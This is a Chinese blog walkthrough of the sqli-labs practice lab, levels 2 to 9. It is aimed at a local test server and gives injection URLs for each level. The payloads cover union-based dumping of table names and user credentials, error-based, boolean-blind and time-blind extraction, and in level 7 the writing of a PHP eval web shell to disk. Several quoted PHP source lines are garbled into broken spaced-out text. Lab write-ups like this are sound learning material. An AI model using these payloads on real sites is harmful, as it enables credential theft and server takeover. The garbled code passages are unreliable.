less 2-10

最新推荐文章于 2023-02-24 11:07:57 发布
最新推荐文章于 2023-02-24 11:07:57 发布
阅读量240 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012922879/article/details/82016691
版权

网址:https://blog.csdn.net/u012763794/article/details/51207833

切记 网址后面#需要切换成%23 否则可能无法正常注入

less 2 GET - Error based - Intiger based (基于错误的GET整型注入)
整型的注入无需单引号
这里写图片描述
通过

http://127.0.0.1/sqli-labs-master/Less-2/?id=1%20union%20select%201,2,3#

应该可以显示数字1,2,3其中的两个才对 ,原来是源码func_mysql_fetch_array的原因
那么我们只要让第一行查询的结果是空集(即union左边的select子句查询结果为空),那么我们union右边的查询结果自然就成为了第一行,就打印在网页上了,这个id他一般传的是数字,而且一般都是从1开始自增的,我们可以把id值设为非正数(负数或0),浮点数,字符型或字符串都行,下面的就是分别举例了

http://127.0.0.1/sqli-labs-master/Less-2/?id=0 union select 1,2,3#

这里写图片描述

因为只有2,3两个位置使用 我们增加

concat_ws(char(32,58,32),user(),database(),version())

 http://127.0.0.1/sqli-labs-master/Less-2/?id=0 union select 1,2,concat_ws(char(32,58,32),user(),database(),version())#

这里写图片描述

查询数据库中的table(表)
这里写图片描述
因为只能返回一个 所以我们使用limit
  Limit子句可以被用于强制 SELECT 语句返回指定的记录数。Limit接受一个或两个数字参数。参数必须是一个整数常量。如果给定两个参数,第一个参数指定第一个返回记录行的偏移量,第二个参数指定返回记录行的最大数目。

  //初始记录行的偏移量是 0(而不是 1):
  mysql> SELECT * FROM table LIMIT 5,10; //检索记录行6-15

  //为了检索从某一个偏移量到记录集的结束所有的记录行,可以指定第二个参数为 -1:
  mysql> SELECT * FROM table LIMIT 95,-1; // 检索记录行 96-last

  //如果只给定一个参数,它表示返回最大的记录行数目。换句话说,LIMIT n 等价于 LIMIT 0,n:
  mysql> SELECT * FROM table LIMIT 5; //检索前 5 个记录行

通过

 http://127.0.0.1/sqli-labs-master/Less-2/?id=1%20union%20select%201,2,table_name%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479%20limit%204,1%23

查找到表users
这里写图片描述

id

http://127.0.0.1/sqli-labs-master/Less-2/?id=0%20union%20select%201,2,column_name%20from%20information_schema.columns%20where%20table_schema=0x7365637572697479%20and table_name=0x7573657273 limit%200,1%23

这里写图片描述

同理可以得到username 和password

less 3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)

lsee2 例子:
id= i d = _GET[‘id’]; // id=id i d = i d 赋 值 必 须 字 符 转 必 须 有 ” 包 裹 sql="SELECT * FROM users WHERE id= idLIMIT0,1;id= i d L I M I T 0 , 1 ” ; i d = id=id

less3 例子:
id= i d = _GET[‘id’]; // id=id i d = i d 赋 值 必 须 字 符 转 必 须 有 ” 包 裹 sql="SELECT * FROM users WHERE id=(' id)LIMIT0,1;id=( i d ′ ) L I M I T 0 , 1 ” ; 得 到 i d = ( ‘ id’)=(‘id’)

less 4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)

less4

id= i d = _GET[‘id’]
sql="SELECTFROMusersWHEREid=( s q l =" S E L E C T ∗ F R O M u s e r s W H E R E i d = ( id) LIMIT 0,1”;

这里写图片描述

所以我们在判断注入时,要加入双引号进行判断哦,而且从下图可看到右括号,那么我们要用右括号闭合左括号

这里写图片描述

payload:

 http://localhost/sqli-labs/Less-4/?id=1") union select 1,2,concat_ws(char(32,58,32),id,username,password) from  users limit 1,1 -- k

less5
代码

sql="SELECTFROMusersWHEREid= s q l =" S E L E C T ∗ F R O M u s e r s W H E R E i d = ′ id’ LIMIT 0,1”;
echo “你的sql语句是:”. sql.; s q l . ” ” ; result=mysql_query( sql); s q l ) ; row = mysql_fetch_array($result);

if($row)
{
echo '<font size="5" color="#FFFF00">'; 
echo 'You are in...........';
echo "<br>";
    echo "</font>";
}

未输出$row

http://localhost/sqli-labs/Less-5/?id=1' union select count(*),count(*), concat((select database()), floor(rand()*2)) as a from information_schema.tables group by a%23

当然只有一个也行

 http://localhost/sqli-labs/Less-5/?id=1' union select count(*),1, concat((select database()), floor(rand()*2)) as a from information_schema.tables group by a%23

less 6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)

payload:

http://localhost/sqli-labs/Less-6/?id=1" union select 1,2,concat_ws(char(32,58,32),id,username,password) from  users limit 1,1 -- k

//下面的这个”是中文双引号

 http://localhost/sqli-labs/Less-6/?id=1哈哈“

union select 1,2,concat_ws(char(32,58,32),id,username,password) from users limit 1,1 – k

http://localhost/sqli-labs/Less-6/?id=1哈哈“ union select 1,2,concat_ws(char(32,58,32),id,username,password) from  users limit 1,1 and ”+

less 7 GET - Dump into outfile - String (导出文件GET字符型注入)

最后的payload:

http://localhost/sqli-labs/Less-7/?id=1')) union select 1,'2','<?php @eval($_POST["giantbranch"]);?>' into outfile 'E:\\wamp\\www\\sqli-labs\\muma.php' %23

这里写图片描述
注意:文件不能覆盖,如下图(所以只能执行一次,只能换名字了)

less 8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)
正确了显示内容 错误了不显示内容 无报错信息

发现加个单引号跟没加显示不一样,加了单引号连you are in都不显示了,没有报错,所以只能用盲注判断了

http://localhost/sqli-labs/Less-8/?id=1' and ascii(substr((select database()),1,1))>114 %23 返回正确,大于114,间在115-116之间

http://localhost/sqli-labs/Less-8/?id=1' and ascii(substr((select database()),1,1))>115 %23 返回错误,不大于115,即第一个字母的ascii为115,即字母s

less 9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)
无论正确或者错误 无报错信息 内容均正常显示

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(ascii(substr(database(),1,1))>114, 0, sleep(5)) %23
么么哒1314
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入及sqli-labs-master/Less-1题解析
weixin_43948394的博客
07-20 591
sql注入 group_concat(str1,str2,…)——连接一个组的所有字符串,并以逗号分隔每一条数据。 mysql中的information_schema 结构用来存储数据库系统信息information_schema 结构中这几个表存储的信息。 database()——数据库名。 可以选择一个数据库名来进行查询 如:security 查询语句:use security; 查询这个数...
最详细的讲解 让你最快通关Less-9-Less-10/ --时间盲注http://127.0.0.1/sqli-labs-master/Less-10/ --时间盲注
m0_58883317的博客
04-17 5481
http://127.0.0.1/sqli-labs-master/Less-10/ --时间盲注 判断注入点 http://127.0.0.1/sqli-labs-master/Less-10/?id=1 and 1=1 and sleep(5) http://127.0.0.1/sqli-labs-master/Less-10/?id=1 and 1=1 and sleep(5) 根据页面显示我们可以知道使用联合注入是不可行的。页面无论对错都只显示you are in所以我们选择和less-9一样
java replace 双引号到单引号
kongjunlongaa的博客
06-06 8164
str.replace("\"", "\'");  或 str.replaceAll("\"", "\'");
深入 -- 双引号字符串加号(+)拼接 创建了几个对象?
Simba_cheng的博客
06-23 5522
双引号字符串加号(+)拼接 创建了几个对象?结论先行:双引号字符串 加号(+) 拼接,不论多少,只创建了一个对象。昨天看到一个题目,挺有意思的。大意是:String a = "1"+"2"+"3"+"4";创建了几个对象??我当时第一反应是1个对象。为什么呢?因为 双引号字符串 直接写是在编译器就直接生成一个对象,class在编译的时候直接放入字符串常量池的。这个知识点,可能时间有点久,自己也不太...
less字符串拼接
热门推荐
开心就好的专栏
05-23 1万+
@iconUrl: "/img";// mixin .c-icon(@bgImg) { background-image: url(@bgImg); } .bg { @someImgUrl: "/icon.png"; // call mixin .c-icon(); .c-icon("@{iconUrl}@{someImgUrl}"); // or below
SQL注入学习#2
Cloud_Player的博客
03-22 144
MySQL注入实例一 平台:SQli-labs ‘ = %27 空格 = %20 为学习方便,可以借用站长工具url编码进行翻译 Less-1 界面如下: 尝试 ?id=1和?id=100 这时候我们可以尝试在?id=100后面加上’(%27),找到注入点 根据报错返回语句,猜测注入语句 SELECT * FROM XXX WHERE id = ‘XX’LIMIT 0, 1 SELECT * FROM XXX WHERE id = ‘1’LIMIT 0, 1 接下来尝试闭合,–+用以注释掉后面的多
sqli-labs 通关笔记详解 Less1 - Less10
HAKUNAMATATATTA的博客
12-18 2845
做sqli-labs靶场之前建议补一下基础。
less 安装 npm install less less-loader --save-dev报错
qq_22656655的博客
06-18 4343
Downloading binary from https://github.com/sass/node-sass/releases/download/v4.11.0/win32-x64-72_binding.node Cannot download "https://github.com/sass/node-sass/releases/download/v4.11.0/win32-x64-72_binding.node": HTTP error 404 Not Found 使用npm insta..
vue安装less、less-loader
weixin_51357044的博客
05-27 5120
最近安装这个less一直报错,要么是less要么是less-loader,各种百度各种不行,最终我这个方法安装成功了 npm ERR! code ERESOLVE npm ERR! ERESOLVE could not resolve npm ERR! npm ERR! While resolving: @vue/eslint-config-standard@6.1.0 npm ERR! Found: eslint-plugin-vue@8.7.1 npm ERR! node_modules/eslint-
VUE2项目安装使用安装less、less-loader以及配置
P20190318249的博客
02-24 2996
less安装配置
less-plugin-autoprefix:添加了由 autoprefixer 对 less 进行后处理的能力
05-29
少插件自动前缀 ... autoprefixPlugin = new LessPluginAutoPrefix ( { browsers : [ "last 2 versions" ] } ) ; less . render ( lessString , { plugins : [ autoprefixPlugin ] } ) . then ( 浏览器
gatsby-less-v2
05-09
gatsby-starter-hello-world 具备网站所需的基本知识的入门者从您的CLI运行此启动程序(假设已安装Gatsby): gatsby new gatsby-site https://github.com/gatsbyjs/gatsby-starter-hello-world在开发中运行gatsby ...
前端开源库-less-modify-var-loader
08-30
2. **配置Webpack**:接着,需要在Webpack的配置文件(webpack.config.js)中引入并配置less-modify-var-loader。你需要在`module.rules`数组中添加一条规则,指定匹配的文件类型(通常是.less文件)以及less-modify...
弹性布局-less--综合案例
11-02
在本综合案例中,我们将探讨如何使用弹性布局(Flexbox)和LESS预处理器来构建响应式的现代网页。弹性布局是CSS3中的一项重要技术,它为网页元素的布局提供了强大的灵活性,尤其在处理多设备、多屏幕尺寸的场景下...
mrcrowl.easy-less-1.7.2.zip
03-25
2. **语法高亮**: 提供了针对LESS语法的高亮显示,使得代码更易读,减少了出错的可能性。 3. **代码提示和补全**: 支持LESS语法的智能感知,提供代码补全服务,帮助快速编写LESS代码。 4. **错误检查**: 在编写过程...
ASP仓库货物管理系统的设计与实现(源代码+论文).rar
08-10
资源包主要包含以下内容: ASP项目源码:每个资源包中都包含完整的ASP项目源码,这些源码采用了经典的ASP技术开发,结构清晰、注释详细,帮助用户轻松理解整个项目的逻辑和实现方式。通过这些源码,用户可以学习到ASP的基本语法、服务器端脚本编写方法、数据库操作、用户权限管理等关键技术。 数据库设计文件:为了方便用户更好地理解系统的后台逻辑,每个项目中都附带了完整的数据库设计文件。这些文件通常包括数据库结构图、数据表设计文档,以及示例数据SQL脚本。用户可以通过这些文件快速搭建项目所需的数据库环境,并了解各个数据表之间的关系和作用。 详细的开发文档:每个资源包都附有详细的开发文档,文档内容包括项目背景介绍、功能模块说明、系统流程图、用户界面设计以及关键代码解析等。这些文档为用户提供了深入的学习材料,使得即便是从零开始的开发者也能逐步掌握项目开发的全过程。 项目演示与使用指南:为帮助用户更好地理解和使用这些ASP项目,每个资源包中都包含项目的演示文件和使用指南。演示文件通常以视频或图文形式展示项目的主要功能和操作流程,使用指南则详细说明了如何配置开发环境、部署项目以及常见问题的解决方法。 毕业设计参考:对于正在准备毕业设计的学生来说,这些资源包是绝佳的参考材料。每个项目不仅功能完善、结构清晰,还符合常见的毕业设计要求和标准。通过这些项目,学生可以学习到如何从零开始构建一个完整的Web系统,并积累丰富的项目经验。
qt下载安装及配置教程的个人学习资料,欢迎使用
08-10
qt下载安装及配置教程qt下载安装及配置教程。内容来源于网络分享,如有侵权请联系我删除。另外如果没有积分的同学需要下载,请私信我。
2019年玖富庄园复利农场 拆分理财复利模拟经营游戏源码美化版
08-10
2019年玖富庄园复利农场 拆分理财复利模拟经营游戏源码美化版 玖富农场是一款跟QQ农场一样的种菜游戏,手机,电脑都可以玩。每天不耽误时间。只需花几秒时间收菜,把菜卖掉就是现金。一天轻松赚取50到500元不等。 1.通过您的推荐链接/推荐码注册的会员,将成为您的推广会员。 2.您将享受推广在玖富庄园每次所兑换砖石的10作为奖励。 使用说明: 1.复制上面的推广链接或推广码,并发送给好友。 2.好友通过链接进入注册页面进行注册,将成为您的推广会员。 3.好友在玖富庄园注册页面填写您的推荐码完成注册,将成为您的推广会员。
毕业设计javajsp中药药方管理系统ssm-qlkrp源码工具包
最新发布
08-10
毕业设计javajsp中药药方管理系统ssm-qlkrp源码工具包 后台是ssm框架,页面是jsp,数据库mysql,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 药房人员管理 医生管理 药材信息管理 药方管理 包含:源码、数据库脚本、环境工具包、相同框架项目的安装教程(在说明文档中)
npm install less less-loader -D 安装less报错
05-09
如果你在安装 `less` 和 `less-loader` 时遇到了报错,可能是由于你的环境缺少依赖或者权限不足等原因导致的。 以下是一些可能的解决方案: 1. 确认你已经安装了 `node.js` 和 `npm`,并且版本都是最新的。 2. 检查你的网络是否正常,可以尝试使用其他镜像源进行安装,例如使用 `cnpm` 或者更换为其他源。 3. 确认你是否有足够的权限进行安装,可以尝试使用管理员权限运行命令行或者修改文件夹权限。 4. 如果你使用的是 Windows 系统,可能需要安装 Visual C++ Build Tools,可以通过这个链接下载并安装:https://visualstudio.microsoft.com/visual-cpp-build-tools/ 5. 如果你使用的是 MacOS 系统,可能需要安装 Xcode 命令行工具,在终端中运行命令 `xcode-select --install` 即可安装。 如果以上解决方案无法解决问题,可以尝试搜索具体的报错信息或者在社区中提问寻求帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值